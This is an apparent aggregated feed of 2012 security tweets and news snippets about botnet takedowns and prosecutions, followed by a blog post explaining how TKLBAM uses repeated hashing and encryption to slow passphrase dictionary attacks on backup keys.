2012-09-14 17:34:40 - ITDataSecurity : Microsoft disrupts Nitol botnet and takes control of malware hosting domain http://tco/LMIMfgIs SC Mag
           MS Digital Crimes Unit still kicking bot herder butt Way to go: http://tco/NtiutIaV That said, when one botnet dies, another is born        
2012-09-14 17:03:32 - watchguardtech : MS Digital Crimes Unit still kicking bot herder butt Way to go: http://tco/NtiutIaV That said, when one botnet dies, another is born
           Microsoft disrupts millions of botnet connections after discovering PCs with http://tco/Sp6o3ExG        
2012-09-14 13:02:48 - securitypro2009 : Microsoft disrupts millions of botnet connections after discovering PCs with http://tco/Sp6o3ExG
           Microsoft thwarts Nitol botnet with restraining order: Microsoft's Digital Crimes Unit was granted a restraining http://tco/P8gH0UNK        
2012-09-14 12:29:27 - hackinthebox : Microsoft thwarts Nitol botnet with restraining order: Microsoft's Digital Crimes Unit was granted a restraining http://tco/P8gH0UNK
           MS Digital Crimes Unit still kicking bot herder butt Way to go: http://tco/YiJLKHar That said, when one botnet dies, another is born        
2012-09-14 08:25:53 - SecAdept : MS Digital Crimes Unit still kicking bot herder butt Way to go: http://tco/YiJLKHar That said, when one botnet dies, another is born
           Microsoft seizes Chinese botnet domain http://tco/P61upY8M        
2012-09-14 06:39:54 - DarkOperator : Microsoft seizes Chinese botnet domain http://tco/P61upY8M
           Microsoft moves to quash counterfeit Windows botnet http://tco/2LjiiPPY        
2012-09-14 06:39:54 - DarkOperator : Microsoft moves to quash counterfeit Windows botnet http://tco/2LjiiPPY
           Microsoft derriba botnet provocada por malware que venía en versiones piratas de Windows http://tco/wpLMB3p1        
2012-09-14 06:39:54 - DarkOperator : Microsoft derriba botnet provocada por malware que venía en versiones piratas de Windows http://tco/wpLMB3p1
           RT @MicrosoftDCU: Microsoft disrupts #Nitol botnet and more than 500 additional strains of malware in latest operation http://tco/Ov5t         
2012-09-14 06:30:49 - msftsecresponse : RT @MicrosoftDCU: Microsoft disrupts #Nitol botnet and more than 500 additional strains of malware in latest operation http://tco/Ov5t
           Microsoft zaps botnet found pre-installed with counterfeit Windows http://tco/6lekWO9f pre-pwn'd PCs        
2012-09-14 06:01:22 - DaveMarcus : Microsoft zaps botnet found pre-installed with counterfeit Windows http://tco/6lekWO9f pre-pwn'd PCs
           RT @virusbtn: Microsoft disrupted the Nitol botnet, but Damballa's @gollmann is far more interested in what they did to 3322•org http://         
2012-09-14 05:49:57 - gianlucaSB : RT @virusbtn: Microsoft disrupted the Nitol botnet, but Damballa's @gollmann is far more interested in what they did to 3322•org http://
           RT @virusbtn: Microsoft disrupted the Nitol botnet, but Damballa's @gollmann is far more interested in what they did to 3322•org http://         
2012-09-14 04:26:55 - gollmann : RT @virusbtn: Microsoft disrupted the Nitol botnet, but Damballa's @gollmann is far more interested in what they did to 3322•org http://
           Nitol botnet takedown and 3322org - evasions already - http://tco/wFFRq9zu        
2012-09-14 04:26:55 - gollmann : Nitol botnet takedown and 3322org - evasions already - http://tco/wFFRq9zu
           RT @virusbtn: Microsoft disrupted the Nitol botnet, but Damballa's @gollmann is far more interested in what they did to 3322•org http://         
2012-09-14 04:19:03 - tdirro : RT @virusbtn: Microsoft disrupted the Nitol botnet, but Damballa's @gollmann is far more interested in what they did to 3322•org http://
           @pboin ATT CSO book called botnets clearly the most important security issue on the Internet today http://tco/l0Nih8eK Now I understand        
2012-09-14 04:10:54 - taosecurity : @pboin ATT CSO book called botnets clearly the most important security issue on the Internet today http://tco/l0Nih8eK Now I understand
           Microsoft Carries out Nitol Botnet Takedown: A botnet known as Nitol, built on the backs of PCs and laptops load http://tco/AVssL6Le        
2012-09-14 03:22:14 - EvilFingers : Microsoft Carries out Nitol Botnet Takedown: A botnet known as Nitol, built on the backs of PCs and laptops load http://tco/AVssL6Le
           Microsoft intercepts 'Nitol' botnet 70,000 malicious domains in court-ordered sinkhole operation: http://tco/XbdiH9sS        
2012-09-14 02:14:11 - DarkReading : Microsoft intercepts 'Nitol' botnet 70,000 malicious domains in court-ordered sinkhole operation: http://tco/XbdiH9sS
           Microsoft thwarts Nitol botnet with restraining order http://tco/ONRv2kK4        
2012-09-14 01:34:42 - teksquisite : Microsoft thwarts Nitol botnet with restraining order http://tco/ONRv2kK4
           Microsoft takes over 3322org domain as part of Nitol botnet disruption http://tco/8mZ8hwn6 This is great news        
2012-09-14 00:37:24 - patrikrunald : Microsoft takes over 3322org domain as part of Nitol botnet disruption http://tco/8mZ8hwn6 This is great news
           RT @briankrebs: Microsoft disrupts 'Nitol' botnet, says malware was pre-loaded onto machines sold in China with pirated OSes http://tc         
2012-09-13 23:46:29 - jaysonstreet : RT @briankrebs: Microsoft disrupts 'Nitol' botnet, says malware was pre-loaded onto machines sold in China with pirated OSes http://tc
           RT @MicrosoftDCU: Microsoft disrupts #Nitol botnet and more than 500 additional strains of malware in latest operation http://tco/Ov5t         
2012-09-13 23:35:46 - GarWarner : RT @MicrosoftDCU: Microsoft disrupts #Nitol botnet and more than 500 additional strains of malware in latest operation http://tco/Ov5t
           RT @codelancer: The order allows Microsoft to host the 3322 org, which hosted the Nitol botnet http://tco/aKrrAqay bye 3322,i'll miss you        
2012-09-13 23:01:42 - craiu : RT @codelancer: The order allows Microsoft to host the 3322 org, which hosted the Nitol botnet http://tco/aKrrAqay bye 3322,i'll miss you
           RT @MicrosoftDCU: Microsoft disrupts #Nitol botnet and more than 500 additional strains of malware in latest operation http://tco/Ov5t         
2012-09-13 23:01:42 - craiu : RT @MicrosoftDCU: Microsoft disrupts #Nitol botnet and more than 500 additional strains of malware in latest operation http://tco/Ov5t
           Microsoft's study into unsecure supply chains leads to botnet disruption http://tco/k4QqQQrJ        
2012-09-13 22:46:00 - CanDeger : Microsoft's study into unsecure supply chains leads to botnet disruption http://tco/k4QqQQrJ
           Diary Microsoft disrupts traffic associated with the Nitol botnet, Thu, Sep 13th: There is an inter http://tco/ShIxFsPO #sansisc        
2012-09-13 22:21:08 - sans_isc : Diary Microsoft disrupts traffic associated with the Nitol botnet, Thu, Sep 13th: There is an inter http://tco/ShIxFsPO #sansisc
           Microsoft's study into unsecure supply chains leads to botnet disruption - http://tco/D4ID2ynv        
2012-09-13 22:12:33 - helpnetsecurity : Microsoft's study into unsecure supply chains leads to botnet disruption - http://tco/D4ID2ynv
           Microsoft's study into unsecure supply chains leads to botnet disruption http://tco/9AmNo768        
2012-09-13 21:40:51 - DarkOperator : Microsoft's study into unsecure supply chains leads to botnet disruption http://tco/9AmNo768
           Microsoft zaps botnet found pre-installed with counterfeit Windows http://tco/G4MhQKXo        
2012-09-13 21:40:51 - DarkOperator : Microsoft zaps botnet found pre-installed with counterfeit Windows http://tco/G4MhQKXo
           Microsoft disrupts 'Nitol' botnet, says malware was pre-loaded onto machines sold in China with pirated OSes http://tco/QIFhNO9x        
2012-09-13 21:30:44 - briankrebs : Microsoft disrupts 'Nitol' botnet, says malware was pre-loaded onto machines sold in China with pirated OSes http://tco/QIFhNO9x
           Microsoft taking on aggressive new Nitol botnet http://tco/lGUVTbrg via @komonews        
2012-09-13 20:42:58 - shelleehale : Microsoft taking on aggressive new Nitol botnet http://tco/lGUVTbrg via @komonews
           RT @MicrosoftDCU: Microsoft disrupts #Nitol botnet and more than 500 additional strains of malware in latest operation http://tco/S2I5KouG        
2012-09-13 20:20:39 - nicolasbrulez : RT @MicrosoftDCU: Microsoft disrupts #Nitol botnet and more than 500 additional strains of malware in latest operation http://tco/S2I5KouG
           RT @MicrosoftDCU: Microsoft disrupts #Nitol botnet and more than 500 additional strains of malware in latest operation http://tco/kUPdYZ3C        
2012-09-13 19:26:14 - gollmann : RT @MicrosoftDCU: Microsoft disrupts #Nitol botnet and more than 500 additional strains of malware in latest operation http://tco/kUPdYZ3C
           3322 org loss will disable alot of botnets Badguys are looking for next DDNS provider already        
2012-09-13 19:26:14 - gollmann : 3322 org loss will disable alot of botnets Badguys are looking for next DDNS provider already
           The DDNS provider 3322 org loses domain to Microsoft That'll screw a few hundred botnet operators Access logs will nailem        
2012-09-13 19:26:14 - gollmann : The DDNS provider 3322 org loses domain to Microsoft That'll screw a few hundred botnet operators Access logs will nailem
           If you're a botnet operator inconvenienced by M$ with the 3322 takedown, advice on fix from Pubyun http://tco/qzGAaut3 to carry on        
2012-09-13 19:26:14 - gollmann : If you're a botnet operator inconvenienced by M$ with the 3322 takedown, advice on fix from Pubyun http://tco/qzGAaut3 to carry on
           RT @MicrosoftDCU: Microsoft disrupts #Nitol botnet more than 500 additional strains of malware in latest op http://tco/NQ0GSf24        
2012-09-13 17:16:09 - grecs : RT @MicrosoftDCU: Microsoft disrupts #Nitol botnet more than 500 additional strains of malware in latest op http://tco/NQ0GSf24
           Microsoft's study into unsecure supply chains leads to botnet disruption http://tco/3GMhUIWs        
2012-09-13 17:15:14 - ITVulnerability : Microsoft's study into unsecure supply chains leads to botnet disruption http://tco/3GMhUIWs
           RT @artem_i_baranov: Disclosure of an interesting Botnet case - The Server Part 2 http://tco/V0fEQRQQ #malware #botnet #cybercrime        
2012-09-13 07:49:01 - 2gg : RT @artem_i_baranov: Disclosure of an interesting Botnet case - The Server Part 2 http://tco/V0fEQRQQ #malware #botnet #cybercrime
           RT @artem_i_baranov: Disclosure of an interesting Botnet case - The Server Part 2 http://tco/V0fEQRQQ #malware #botnet #cybercrime        
2012-09-13 00:44:22 - y0ug : RT @artem_i_baranov: Disclosure of an interesting Botnet case - The Server Part 2 http://tco/V0fEQRQQ #malware #botnet #cybercrime
           RT @artem_i_baranov: In process of botnet case investigation, old DrWeb sinkhole servers were found, lol http://tco/V0fEQRQQ #malware         
2012-09-12 13:18:28 - xanda : RT @artem_i_baranov: In process of botnet case investigation, old DrWeb sinkhole servers were found, lol http://tco/V0fEQRQQ #malware
           RT @artem_i_baranov: Disclosure of an interesting Botnet case - The Executable Part 1http://tco/6azxKujz #malware #botnet #cybercrime        
2012-09-12 02:31:33 - 2gg : RT @artem_i_baranov: Disclosure of an interesting Botnet case - The Executable Part 1http://tco/6azxKujz #malware #botnet #cybercrime
           We DDoSed Godaddy using a botnet composed completely of iPhone 5s Details at http://tco/BOa6eTRc        
2012-09-11 12:42:15 - rmogull : We DDoSed Godaddy using a botnet composed completely of iPhone 5s Details at http://tco/BOa6eTRc
           RT @rmogull: We DDoSed Godaddy using a botnet composed completely of iPhone 5s Details at http://tco/mf3NjzPf -On the web so must be true        
2012-09-11 11:38:50 - armorguy : RT @rmogull: We DDoSed Godaddy using a botnet composed completely of iPhone 5s Details at http://tco/mf3NjzPf -On the web so must be true
           RT @DrM_fr: Protecting web service from botnet exploitations http://tco/b2YXdSY1 #phd #thesis #botnets via @aszy        
2012-09-11 05:23:43 - 2gg : RT @DrM_fr: Protecting web service from botnet exploitations http://tco/b2YXdSY1 #phd #thesis #botnets via @aszy
           RT @DrM_fr: Protecting web service from botnet exploitations http://tco/b2YXdSY1 #phd #thesis #botnets via @aszy        
2012-09-11 04:00:59 - gianlucaSB : RT @DrM_fr: Protecting web service from botnet exploitations http://tco/b2YXdSY1 #phd #thesis #botnets via @aszy
           RT @DrM_fr: Protecting web service from botnet exploitations http://tco/b2YXdSY1 #phd #thesis #botnets via @aszy        
2012-09-11 03:23:07 - nicolasbrulez : RT @DrM_fr: Protecting web service from botnet exploitations http://tco/b2YXdSY1 #phd #thesis #botnets via @aszy
           RT @aszy: Protecting web service from botnet explotations http://tco/UcXyOJB9        
2012-09-11 00:49:17 - xanda : RT @aszy: Protecting web service from botnet explotations http://tco/UcXyOJB9
           Hacker gets 30 months for botnet that hit 72,000 PCs #security #legal http://tco/fBKitarj via @itproportal        
2012-09-10 19:46:06 - dpwallace : Hacker gets 30 months for botnet that hit 72,000 PCs #security #legal http://tco/fBKitarj via @itproportal
           Protecting web service from botnet explotations http://tco/PzcwOzHG        
2012-09-10 13:40:16 - aszy : Protecting web service from botnet explotations http://tco/PzcwOzHG
           Hacker gets 30 months for botnet that hit 72,000 PCs http://tco/jNXnPpiH        
2012-09-10 13:17:05 - DarkOperator : Hacker gets 30 months for botnet that hit 72,000 PCs http://tco/jNXnPpiH
           Former botnet controller sentenced to 30 months in the US http://tco/bcrPJJqc SC Mag        
2012-09-08 18:42:14 - ITDataSecurity : Former botnet controller sentenced to 30 months in the US http://tco/bcrPJJqc SC Mag
           Reading -- Arizona man imprisoned for selling access to botnets http://tco/L0lwB2Yp via @networkworld        
2012-09-08 11:19:36 - LogTalk : Reading -- Arizona man imprisoned for selling access to botnets http://tco/L0lwB2Yp via @networkworld
           Former botnet controller sentenced to 30 months in the US - SC Magazine UK http://tco/DGfFKSi0        
2012-09-08 10:28:24 - SCmagazineUK : Former botnet controller sentenced to 30 months in the US - SC Magazine UK http://tco/DGfFKSi0
           Arizona man goes to prison for selling access to botnets - http://tco/qDPFLUpG        
2012-09-08 00:41:14 - helpnetsecurity : Arizona man goes to prison for selling access to botnets - http://tco/qDPFLUpG
           Condenan a un hacker por vender un botnet http://tco/E3reRuRx        
2012-09-07 23:32:53 - DarkOperator : Condenan a un hacker por vender un botnet http://tco/E3reRuRx
           Former botnet controller sentenced to 30 months in the US http://tco/C4FoAzgB SC Mag        
2012-09-07 21:53:25 - ITDataSecurity : Former botnet controller sentenced to 30 months in the US http://tco/C4FoAzgB SC Mag
           Botnet master gets 30-month prison term for renting out infected PCs: A hacker who controlled a botnet of 72,000 http://tco/ixKDzY6G        
2012-09-07 12:06:29 - hackinthebox : Botnet master gets 30-month prison term for renting out infected PCs: A hacker who controlled a botnet of 72,000 http://tco/ixKDzY6G
           Avances en la detección de botnets por tráfico DNS http://tco/CPJwlHmY        
2012-09-07 00:30:48 - DarkOperator : Avances en la detección de botnets por tráfico DNS http://tco/CPJwlHmY
           Should probably revisit my opsec after logging into a botnet CC and subtly mocking the operators        
2012-09-07 00:27:26 - madirish2600 : Should probably revisit my opsec after logging into a botnet CC and subtly mocking the operators
           RT @botnets_fr: RT @ericfreyss Vulnérabilité Java CVE-2012-4681 – Et si on devenait enfin responsables « Blog Criminalités numériques         
2012-09-06 22:34:02 - CERTXMCO : RT @botnets_fr: RT @ericfreyss Vulnérabilité Java CVE-2012-4681 – Et si on devenait enfin responsables « Blog Criminalités numériques
           http://tco/DARfhMBC The virus activity in August 2012: the growing botnets Java vulnerabilities and new threats to Android September 3,        
2012-09-06 22:21:20 - netForensics : http://tco/DARfhMBC The virus activity in August 2012: the growing botnets Java vulnerabilities and new threats to Android September 3,
           Setting up a botnet is easier than you think http://tco/xbjzXDXy Computer Weekly        
2012-09-06 22:19:51 - ITDataSecurity : Setting up a botnet is easier than you think http://tco/xbjzXDXy Computer Weekly
           Interesting My Citadel sinkhole of one botnet shows me 100 pourcents infections are in Netherlands, Norway, Finland and Germany        
2012-09-06 19:14:06 - Kleissner : Interesting My Citadel sinkhole of one botnet shows me 100 pourcents infections are in Netherlands, Norway, Finland and Germany
           Oh yeah and I welcome the fefe botnet        
2012-09-06 12:22:59 - i0n1c : Oh yeah and I welcome the fefe botnet
           RT @eSecurityP: McAfee warns of botnet malware that spreads through chat incl ICQ, Skype, GTalk, Pidgin, MSN, YIM Facebook http:         
2012-09-06 09:41:24 - TeMerc : RT @eSecurityP: McAfee warns of botnet malware that spreads through chat incl ICQ, Skype, GTalk, Pidgin, MSN, YIM Facebook http:
           @MalwareMustDie - awesome work you are doing Just saw your site thanks to botnetsfr        
2012-09-06 06:27:59 - GarWarner : @MalwareMustDie - awesome work you are doing Just saw your site thanks to botnetsfr
           #RSAC EU 2012 preview: No followers No botnet No problem Asymmetric denial of service attacks ft Bryan Sullivan http://tco/5133HqNV        
2012-09-06 02:36:34 - RSAConference : #RSAC EU 2012 preview: No followers No botnet No problem Asymmetric denial of service attacks ft Bryan Sullivan http://tco/5133HqNV
           Spamhaus anuncia la muerte de la botnet Grum, pero surge Festi http://tco/nTAk8gpb        
2012-08-18 07:49:56 - DarkOperator : Spamhaus anuncia la muerte de la botnet Grum, pero surge Festi http://tco/nTAk8gpb
           RT @botnets_fr: Un article de @briankrebs où on retrouve notamment des éléments collectés par @kafeine de botnetspointfr http://tco/Q         
2012-08-14 17:41:46 - ericfreyss : RT @botnets_fr: Un article de @briankrebs où on retrouve notamment des éléments collectés par @kafeine de botnetspointfr http://tco/Q
           Nouveau commentaire publié : Le responsable du botnet Bredolab écope de prison ferme http://tco/R3a4ei1b        
2012-08-10 15:42:23 - UnderNews_fr : Nouveau commentaire publié : Le responsable du botnet Bredolab écope de prison ferme http://tco/R3a4ei1b
           Suspected Mariposa botnet mastermind goes on trial http://tco/MMgqDZJv        
2012-08-09 02:40:00 - SophosLabs : Suspected Mariposa botnet mastermind goes on trial http://tco/MMgqDZJv
           Infosec - Suspected Mariposa botnet mastermind goes on trial http://tco/Y3G3awum        
2012-08-08 12:14:39 - AlertBoot : Infosec - Suspected Mariposa botnet mastermind goes on trial http://tco/Y3G3awum
           RT @STA_English: 26-year-old Slovenian hacker Iserdo stands accused of being the mastermind behind the Mariposa botnet in trial that s         
2012-08-08 11:24:34 - ericfreyss : RT @STA_English: 26-year-old Slovenian hacker Iserdo stands accused of being the mastermind behind the Mariposa botnet in trial that s
           Suspected Mariposa botnet mastermind goes on trial http://tco/5EAO5pkG        
2012-08-08 09:10:51 - HenkvanRoest : Suspected Mariposa botnet mastermind goes on trial http://tco/5EAO5pkG
           Suspected Mariposa botnet mastermind goes on trial http://tco/OuBCKPET        
2012-08-08 05:49:17 - ITVulnerability : Suspected Mariposa botnet mastermind goes on trial http://tco/OuBCKPET
           Prototype system goes after DNS-based botnets http://tco/y9SBVCEa        
2012-08-08 05:04:17 - securitypro2009 : Prototype system goes after DNS-based botnets http://tco/y9SBVCEa
           Suspected Mariposa botnet mastermind goes on trial http://tco/3hhZRLmQ        
2012-08-07 23:26:42 - gcluley : Suspected Mariposa botnet mastermind goes on trial http://tco/3hhZRLmQ
           All your botnet are belong to us http://tco/19ZpCEL2        
2012-08-07 16:57:44 - 2gg : All your botnet are belong to us http://tco/19ZpCEL2
           RT @dwaaan: so i heard @Panda_security provides premier IRC shells for botnet hosting        
2012-08-06 22:25:03 - daveaitel : RT @dwaaan: so i heard @Panda_security provides premier IRC shells for botnet hosting
           Easily available tools, botnets contribute to DDoS rise http://tco/pIX1lD3e SC Mag        
2012-08-06 16:00:57 - ITDataSecurity : Easily available tools, botnets contribute to DDoS rise http://tco/pIX1lD3e SC Mag
           Interesting, found a 4th TinyBanker botnet Used to use http://tco/PxCpdCZT as CC All 4 Tinba botnets are permanently down though        
2012-08-06 12:34:34 - Kleissner : Interesting, found a 4th TinyBanker botnet Used to use http://tco/PxCpdCZT as CC All 4 Tinba botnets are permanently down though
           Easily available tools, botnets contribute to DDoS rise http://tco/IfECTAlz        
2012-08-05 17:33:49 - DarkOperator : Easily available tools, botnets contribute to DDoS rise http://tco/IfECTAlz
           News Easily available tools, botnets contribute to DDoS rise http://tco/0E3SBTeO        
2012-08-05 04:51:15 - SecurityTube : News Easily available tools, botnets contribute to DDoS rise http://tco/0E3SBTeO
           RT @SecMash: #InfoSec Easily available tools, botnets contribute to DDoS rise http://tco/fSP6rFCp #CyberSecurity        
2012-08-04 23:58:33 - kellepc : RT @SecMash: #InfoSec Easily available tools, botnets contribute to DDoS rise http://tco/fSP6rFCp #CyberSecurity
           @mikko if not every distributed cloud service is a botnet The word is lost to a negative meaning, just like hacker        
2012-08-04 23:20:45 - JGamblin : @mikko if not every distributed cloud service is a botnet The word is lost to a negative meaning, just like hacker
           @mikko I'd say yes, although its intentions are benign At the same, any AV is a botnet too        
2012-08-04 21:39:13 - lostinsecurity : @mikko I'd say yes, although its intentions are benign At the same, any AV is a botnet too
           @Propachlor @mikko @voltheir yeah but anon botnets interact with other nodes very nonconsentually        
2012-08-04 21:12:20 - dakami : @Propachlor @mikko @voltheir yeah but anon botnets interact with other nodes very nonconsentually
           RT @mikko: Do you consider Microsoft Update to be a botnet And if not, why not        
2012-08-04 11:33:20 - FSecure : RT @mikko: Do you consider Microsoft Update to be a botnet And if not, why not
           nullcon Delhi: Relasing framework AEF for exploitation, malware and botnets research/testing on Android devices http://tco/muP6hn8X        
2012-08-02 10:28:58 - nullcon : nullcon Delhi: Relasing framework AEF for exploitation, malware and botnets research/testing on Android devices http://tco/muP6hn8X
           More than 1/2 of top 20 F500 firms infected with 'Gameover' Zeus botnet: http://tco/9fhWLB4Q #Blackhat        
2012-08-02 01:49:02 - DarkReading : More than 1/2 of top 20 F500 firms infected with 'Gameover' Zeus botnet: http://tco/9fhWLB4Q #Blackhat
           Could end of email spam be in sight after collapse of Grum botnet http://tco/gQRLLDrr        
2012-07-31 23:04:51 - securitypro2009 : Could end of email spam be in sight after collapse of Grum botnet http://tco/gQRLLDrr
           Spam volume looks to decrease after shutdown of major botnet http://tco/gwRiuHvK via @ProofpointNews        
2012-07-31 10:50:21 - Proofpoint_Inc : Spam volume looks to decrease after shutdown of major botnet http://tco/gwRiuHvK via @ProofpointNews
           In the blog: How the takedown of the Grum botnet impacted spam volumes, some musings about the future of botnets http://tco/AikNhf5z        
2012-07-31 10:50:21 - Proofpoint_Inc : In the blog: How the takedown of the Grum botnet impacted spam volumes, some musings about the future of botnets http://tco/AikNhf5z
           RT @ESET: P2P 'Gameover ZeuS' seen as largest bank-theft botnet http://tco/IIxrB29P        
2012-07-31 09:03:44 - SCforum : RT @ESET: P2P 'Gameover ZeuS' seen as largest bank-theft botnet http://tco/IIxrB29P
           I just cracked unnamed Storm Dogod Chinese botnet builder It was piece of cake : http://tco/cHEAEett        
2012-07-31 08:20:13 - 2gg : I just cracked unnamed Storm Dogod Chinese botnet builder It was piece of cake : http://tco/cHEAEett
          Passphrase dictionary attack countermeasures in tklbam's keying mechanism        

Background: how a backup key works

In TKLBAM the backup key is a secret encrypted with a passphrase which is uploaded to the Hub.  Decrypting the backup key yields the secret which is passed on to duplicity (and eventually to GnuPG) to be used as the symmetric key with which backup volumes are encrypted on backup and decrypted on restore.

When you create a new backup, or change the passphrase on an existing backup, a new backup key is uploaded to the Hub where it is stored in the key field for that backup record.

When you restore, tklbam downloads the backup key from the Hub and decrypts it locally on the computer performing the restore. Note that the Hub only allows you to download the backup key for backup records to which you have access (e.g., you are the owner).

Only you can decrypt your passphrase protected backups

All of this matters because it means that as long as you use a passphrase to protect the key, even the Hub can't decrypt your backups, only you can - provided you remember the passphrase (or failing that, at least have the escrow key stored in a safe place).

In other words, the decryption of the backup key happens locally and at no point does the passphrase reach the Hub, so we can't decrypt your backup even if you asked us to. Neither can an attacker that has theoretically compromised the Hub, or a government agency that comes kicking down our door with a court warrant.

The problem with cryptographic passphrases

But wait. If an attacker has local access to the key, his ability to run dictionary attacks to find the key's passphrase is limited only by the computational resources he can throw at it.

Remember there's a critical difference between a passphrase used for authentication purposes (e.g., to an online service) and a passphrase used for cryptographic purposes.

By contrast, a passphrase used for authenticating to an online service doesn't need to be as strong as a passphrase that is used cryptographically because with an online service, even if no explicit countermeasures are used (e.g., IP blacklisting on too many failed attempts) there is still a network between the attacker and the service. The available bandwidth places a debilitating upper limit on how many passphrases can be tried per second. Also, in practice there are usually  bottlenecks in other places which would slow down an online dictionary attack even further.

But a passphrase used for cryptographic purposes assumes the attacker has access to the ciphertext, and that's a whole different ball game.

To better understand what we're up against, here's the formula for calculating the size of the passphrase search space:

log(howmany_different_possible_values ** howmany_values) / log(2)

For example, consider a typical 6 letter password.

6 ASCII printable letters = maximum 42-bits of search space.

That's a maximum of 4 trillion possible combinations. Which sounds like a lot. But it really isn't, since:

  1. You can probably squeeze out about 1 million local passphrase tests per second from a modern multi-core workstation, assuming a typical passphrase encryption method is used.

  2. This is one of those problems that are trivial to parallelize.

    If you rent just 100 computers (e.g., in the cloud) you could exhaustively search through 42-bits in about 5 days.

    And remember, today the bad guys often have millions of computers at their disposal via botnets.

  3. People are very bad at choosing truly random passwords. A clever attacker will try the low hanging fruit first, so they're likely to find out your passphrase much sooner than by brute forcing blindly through the full search space.

    For example, say you know a 6 letter password is much too short for an encryption key and instead you're using a longer random combination of 10,000 common English words:

    • 2 words = 18-bits worth of search space.
    • 3 words = 27-bits worth of search space.
    • 4 words = 36-bits worth of search space.

    English words aren't very random so your "paranoid" 3 word, 17 letter passphrase may actually be easier to crack than a truly random combination of just 4 ASCII printable characters (28-bits).

    For comparison, let's see what happens if you use 6 random individual characters.

    If you just use random lowercase characters the search space is reduced to 27-bits which is 32,768 times easier to search through than the full 42-bit search space of 6-letter ASCII printable passwords.

    If you just use random lowercase characters and numbers, the search space is 30-bits which is 4,096 times easier to search through.

    If you just use random lowercase and uppercase characters and numbers, the search space is 35-bits which is 128 times easier to search through.

The good news is that each bit of search space doubles the expense for the attacker.

The bad news is that it takes a truly random combination of 11 uppercase, lowercase characters and numbers just to reach 64-bits worth of search space, and a 10M strong botnet could crack even that in an average of 10 days.

Bottom line: even your supposedly ultra-paranoid passphrase (e.g., r0m4n14nv4mp1r344rdv4rkn3st) of 4 random words from a dictionary of 150K words (in l33t speak) only has about 50-bits worth of entropy, despite being 27 characters long. A 10,000 botnet could crack that in about a day.

Countermeasures: increase computational cost

Though it's impossible to prevent these attacks entirely I've implemented a couple of countermeasures in the way TKLBAM generates passphrase protected keys:

1) The first trick: increase how computationally expensive it is to calculate the cipher key from the passphrase:

def _repeat(f, input, count):
    for x in xrange(count):
        input = f(input)
    return input

def _cipher_key(passphrase, repeats):
    cipher_key = _repeat(lambda k: hashlib.sha256(k).digest(),
                         passphrase, repeats)

The principle is that calculating a hash costs CPU time so by feeding the hash into itself enough times we can linearly increase how expensive it is to map the passphrase-space to the key-space.

For example, repeating the hash routine 100,000 times takes about a quarter second on one of the cores of my computer. If I use all 4 cores this limits me to generating 16 cipher keys per second. Down from 1.6 million cipher keys per second. So that's one way to dramatically reduce the practical feasibility of a dictionary or exhaustive brute force attack.

Note that an attacker can't circumvent this calculation by searching through the key-space directly because even after we increase the cost of generating the passphrase space a 100,000 times over, the cost of trying to bruteforce the 256-bit key-space directly is still countless trillions of times greater.

The weakness of this technique is that an attacker would have to pay the cost of mapping the passphrase-space (e.g., a dictionary) to the key-space only once when trying to crack multiple keys.

2) The second trick: increase how computationally expensive it is to decrypt the key packet by increasing the number of times we pass it through encryption:

def _cipher(cipher_key):
    return AES.new(cipher_key, AES.MODE_CBC)

ciphertext = _repeat(lambda v: _cipher(cipher_key).encrypt(v),
                     _pad(plaintext), cipher_repeats)

This part of the computational expense is key-specific so trading off memory to pre-calculate the mapped key-space won't help you with this step.

Implementation notes

Embedding repeat parameters in the key packet

The current implementation hardwires 100,000 repeats of the hash, and another 100,000 repeats of the cipher.

This makes searching through the passphrase-space about 200,000 times more expensive. On my workstation it takes 0.5 seconds to encrypt or decrypt a key (per-core).

I'm not sure these are the ideal parameters but they are in the ball park of how much you can increase the computational expense before usability suffers.

That's not to say you couldn't go higher, but there's a practical upper boundary to that too. If you're willing to wait about a minute for key generation/decryption you could increase the computational expense about 100 times over and that would give you 100 times better protection or allow you to use a password that is 100 times weaker with the same protection.

Just in case, to allow the number of repeats to change or be user configurable in the future the key formatter routine embeds the repeat parameters into the unencrypted portion of the key packet. This allows the key parsing routine to extract these parameters from the key itself so it can just as easily parse a 0.5 second key (I.e., the current default) as a 5 second, or 50 second key.

Embedding a version id

Just to make sure the key format is future proof I'm also embedding a version id into it.

Embedding a version costs almost nothing (an extra byte) and makes it easier to support incompatible changes to the key format should the need arise (e.g., changing of cipher/hash, changing the format, etc.).

Worst case scenario, we increment the version and implement a new incompatible key format. Old clients won't be able to understand the new key format but will at least fail reliably, and new clients will be able to support both new and old key formats.


          O que é e para que serve uma Botnet        
Uma botnet ou rede de robôs ou zumbis são redes de computadores infectados por um malware de acesso remoto, no qual fica aguardando uma ordem para atacar um alvo, essa ordem normalmente vem do dono da rede de zumbis e o alvo normalmente são servidores web ou não, que rodam serviços muito utilizados como Netflix, […]
          Bad malware storms brewing        
ADTMAG.com has an interesting article talking of the convergance of spyware and more sophisticated phishing attacks. They talk about the convergance of viruses and spam engines that happened in 2003 as a real shift in the dynamic of WHERE junk mail was coming from. Today botnets account for about 90% of the spam online, and [...]
           The botnet: webs of hegemony/zombies who publish         
Eve, Martin Paul (2013) The botnet: webs of hegemony/zombies who publish. In: Zombies in the academy: living death in higher education. Intellect Press, Bristol. ISBN 9781841507149
          03.03.2008 Skrót wiadomości IDG.pl - wersja audio         
Dziś w IDG.pl: Niska popularność Visty owocem błędów przeszłości; Spamuje nas sześć botnetów; CeBIT: targi pod znakiem ekologii; Mozilla Firefox 4 - już jest; "Atomowe" procesory Intela;
          22.02.2008 Skrót wiadomości IDG.pl - wersja audio         
Dziś w IDG.pl: Microsoft się otwiera i przestaje straszyć patentami; Vista SP1 x64 - zamęt rośnie; Zwolennicy ODF i OOXML powinni współpracować; Kanada: akcja antybotnetowa z polskim akcentem; Koniec kompatybilności w PS3;
          Time to check your DNS settings?        
On Wednesday, the German Federal Office for Information Security (BSI) published a press release advising users to recheck DNS server settings on their computers. This recommendation is related to the successful botnet takedown – dubbed ‘Operation Ghost Click’ –  led by the FBI during November 2011. The bad guys behind this botnet had infested approximately 4 ... Read More...
Read More This topic first appeared in the Spiceworks Community
          Suspended Sentence for Mirai Botmaster Daniel Kaye        
Last month, KrebsOnSecurity identified U.K. citizen Daniel Kaye as the likely real-life identity behind a hacker responsible for clumsily wielding a powerful botnet built on Mirai, a malware strain that enslaves poorly secured Internet of Things (IoT) devices for use in large-scale online attacks. Today, a German court issued a suspended sentence for Kaye, who now faces related cybercrime charges in the United Kingdom.
          The Coming Wave of Cloud Security Startups        
This is a reprint of an article I wrote this week for MIT Technology Review.

Our growing computer security problems will create many new companies.

